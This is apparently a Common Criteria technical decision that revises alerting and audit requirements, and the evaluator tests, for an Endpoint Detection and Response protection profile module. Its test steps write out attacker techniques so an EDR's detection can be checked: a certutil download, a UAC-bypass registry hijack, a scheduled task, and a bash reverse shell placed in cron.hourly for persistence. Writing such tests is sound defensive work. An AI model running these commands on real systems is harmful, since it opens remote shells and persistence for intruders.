The functionality for the “a. Change in Host Agent enrollment status” bullet in the FAU_ALT_EXT.1.1 SFR in the PP-Module for Endpoint Detection and Response Version 1.0 does not fit in the context of the SFR, assurance activities, as well as potentially creates other inconsistencies in the PP-Module. 

One of the guidance evaluation activities for FAU_ALT_EXT.1.3 in the Supporting Document for MOD_EDR_V1.0 implies a requirement that is not present in the SFR and is not sufficiently clear on the level of detail required.

The following modifications are made to FAU_ALT_EXT.1.1 in MOD_EDR_V1.0, with removed text in red strikethrough and added text in green underline.

FAU_ALT_EXT.1.1 The EDR shall alert authorized users on a management dashboard in the event of any of the following: detection of potentially unauthorized activity on enrolled endpoints.

a. Change in Host Agent enrollment status;

b. Detection of potentially unauthorized activity on enrolled endpoints

Application Note: The intent of this requirement is to specify the minimum set of management dashboard alert capabilities the EDR must be capable of displaying to an authorized user.

Examples of detection of potentially unauthorized activity on enrolled endpoints include; anomalous activity, escalation of privileges, and lateral movement.

The following modifications are made to FAU_ALT_EXT.1.1 in MOD_EDR_V1.0 SD, with removed text in red strikethrough and added text in green underline.

TD0735 is archived and replaced with the following:

FAU_ALT_EXT.1 Server Alerts

TSS

The evaluator shall examine the TSS to ensure that it describes how alerts for changes in Host Agent enrollment status and potentially unauthorized activities on enrolled endpoints are detected and displayed. The evaluator shall examine the TSS to ensure it contains the list of unauthorized activity types categorized or labeled by the EDR upon detection.

The evaluator shall examine the TSS to ensure that it describes how alert visualizations are displayed and what content is included.

The evaluator shall examine the TSS to ensure that it describes what formats are supported.

 Guidance

The evaluator shall review operational guidance to ensure that it contains documentation on enrolling and unenrolling Host Agents from the EDR.

The evaluator shall review operational guidance to identify a list of unauthorized activity types categorized or labeled by the EDR upon detection.

The evaluator shall ensure guidance includes any needed configuration information for displaying alerts in relation to changes in Host Agent enrollment status and potentially unauthorized activities.

The evaluator shall review the operational guidance to ensure that it contains documentation on using the management dashboard to visualize and view alerts.

The evaluator shall review the operational guidance to ensure that it contains documentation on the products supported for exporting alerts in standards-based formats.

The evaluator shall examine the guidance documentation to ensure it describes the formats supported and the methods of data export being claimed (e.g., written to a file on the underlying platform, communication over a TOE interface to another product, etc.). If communication over a TOE interface to another product (other than the underlying platform) is required to export the data, the evaluator shall verify the guidance documentation describes what products or product types are supported, how to establish communication with those products, any requirements on those products (particular communication protocol, version of the protocol required, etc.), and the configuration of the TOE needed to communicate with those products.

Tests

The evaluator shall perform the following tests:

The evaluator shall follow guidance to unenroll a Host Agent from the EDR and verify that the unenrollment action is recorded in an auditable and timestamped activity log.

The evaluator shall follow guidance to enroll a Host Agent to the EDR and verify that the enrollment action is recorded in an auditable and timestamped activity log.

For Windows, the evaluator shall test the EDR's ability to detect anomalous activity by performing the following subtests based on the platform of the enrolled Host Agent's system, verifying for each that, corresponding alerts were generated in the management dashboard:

• Test 1: The evaluator shall open a Windows command prompt as a user and run the command cmd /c certutil -urlcache -split -f  , where the remote file is a valid file path to an accessible, remotely stored executable, and the download directory is a valid directory path writable by the current local user.
• Test 2: The evaluator shall open a Windows command prompt as a user and run the command reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "" /f, where the local executable is a valid file path to a readable, local executable. The evaluator will then run the command cmd.exe /c eventvwr.msc in the same command prompt window.
• Test 3: The evaluator shall open a Windows command prompt as a user and run the commandSCHTASKS /Create /SC ONCE /TN spawn /TR " /ST , where the local executable is a valid file path to a readable, local executable, and time is a start time that occurs within minutes of the task being created.

For Linux, the evaluator shall test the EDR's ability to detect anomalous activity by performing the following subtests based on the platform of the enrolled Host Agent's system, verifying for each that, corresponding alerts were generated in the management dashboard:

• Test 1: The evaluator shall open a terminal and run the command scp @: ,  where the remote user is a valid user on remote host, remote path is a valid path to a remotely stored executable, and the download directory is a valid directory path writable by the current local user. The remote user's password shall be provided when prompted.
• Test 2: The evaluator shall open a terminal and run the commandecho "bash -i >& /dev/tcp//5050 0>&1 1 &" > /etc/cron.hourly/persist, where the outside IP is a valid external address.

For all platforms:

• Test 1: The evaluator shall review an alert on the management dashboard and verify that the alert contains a severity field and the fields specified in the ST. The evaluator will open or view the alert and verify that a timeline of events is available for review. The timeline shall show a progression of events over time.
• Test 2: The evaluator shall pick an alert on the management dashboard and export the alert in every format specified in the ST. The evaluator shall review the operational guidance and the selection from the requirement and verify that export options exist for all the declared formats in the selection. After exporting one alert for each possible format the evaluator shall review the file contents of the exported alert and verify it is the correct format for the selected export option (for example, an export of the IODEF type must contain 'IODEF-Document' in the first element of the exported file).

The following modifications are made to FAU_GEN.1.1/EDR in MOD_EDR_V1.0, with removed text in red strikethrough and added text in green underline.

FAU_GEN.1.1/EDR

Refinement: The EDR shall generate an audit record of the following auditable events:

a.    Start-up and shutdown of the audit functions;

b.    All auditable events for the [not specified] level of audit; and

[

a.    EDR management dashboard log in activity;

b.    Remediation commands sent to a Host Agent, affected endpoint, or network devices;

c.     EDR configuration changes;

d.    Change in Host Agent enrollment status,

e.    [assignment: Other auditable events]

].

Application Note: The intent of this requirement is to specify the minimum set of audit records generated about actions on the EDR.

The following modifications are made to FAU_GEN.1/EDR in MOD_EDR_V1.0 SD, with removed text in red strikethrough and added text in green underline.

FAU_GEN.1/EDR Audit Data Generation

TSS

The evaluator shall check the TSS and ensure that it lists all of the auditable events claimed in the SFR. The evaluator shall check to make sure that every audit event type specified by the SFR is described in the TSS.

The evaluator shall check the TSS and ensure that it provides a format for audit records. Each audit record format type must be covered, along with a brief description of each field.

Guidance

The evaluator shall check the administrative guide and ensure that it lists all of the auditable events claimed in the SFR. The evaluator shall check to make sure that every audit event type mandated by the SFR is described.

The evaluator shall examine the administrative guide and make a determination of which commands are related to the configuration (including enabling or disabling) of the mechanisms implemented in the EDR that are necessary to enforce the requirements specified in the PP-Module. The evaluator shall document the methodology or approach taken while determining which actions in the administrative guide are security relevant with respect to this PP-Module. The evaluator may perform this activity as part of the activities associated with ensuring the AGD_OPE guidance satisfies the requirements.

The evaluator shall check the administrative guide and ensure that it provides a format for audit records. Each audit record format type must be covered, along with a brief description of each field. The evaluator shall check to make sure that the description of the fields contains the information required in FAU_GEN.1.2/EDR.

The evaluator shall review operational guidance to ensure that it contains documentation on enrolling and unenrolling Host Agents from the EDR.

Tests

The evaluator shall perform the following tests:

• Test 1: The evaluator shall login to the EDR management dashboard and verify that audit log data describing the activity is recorded.
• Test 2: The evaluator shall issue a valid remediation command provided by the EDR to a Host Agent and verify that audit log data describing the activity is recorded on the EDR management dashboard.
• Test 3: The evaluator shall change a non-destructive EDR configuration option within the EDR management dashboard, change it back to the original setting, and verify that the audit log data describing the activity is recorded.
• Test 4: The evaluator shall follow guidance to unenroll a Host Agent from the EDR and verify that the unenrollment action is recorded in an auditable and timestamped activity log.
  Test 5: The evaluator shall follow guidance to enroll a Host Agent to the EDR and verify that the enrollment action is recorded in an auditable and timestamped activity log.
• Test 6: The evaluator shall perform the action to generate all other auditable events listed in the assignement and verify the activity is recorded.

When verifying the test results from FAU_GEN.1.1/EDR, the evaluator shall ensure the audit records generated during testing match the format specified in the administrative guide, and that the fields in each audit record have the proper entries.

Note that the testing here can be accomplished in conjunction with the testing of the security mechanisms directly. For example, testing performed to ensure that the administrative guidance provided is correct verifies that AGD_OPE.1 is satisfied and should address the invocation of the administrative actions that are needed to verify the audit records are generated as expected.

"a. Change in Host Agent enrollment status” does not belong in FAU_ALT_EXT.1 and is better addressed in FAU_GEN.1/EDR.

FAU_ALT_EXT.1.3 does not require the TOE to communicate with another product to export data, as the TOE could output the data to a file, which could then be imported into another product. 

"Documentation on the products supported" could falsely imply that the vendor must provide all guidance needed for another product to receive and process the data.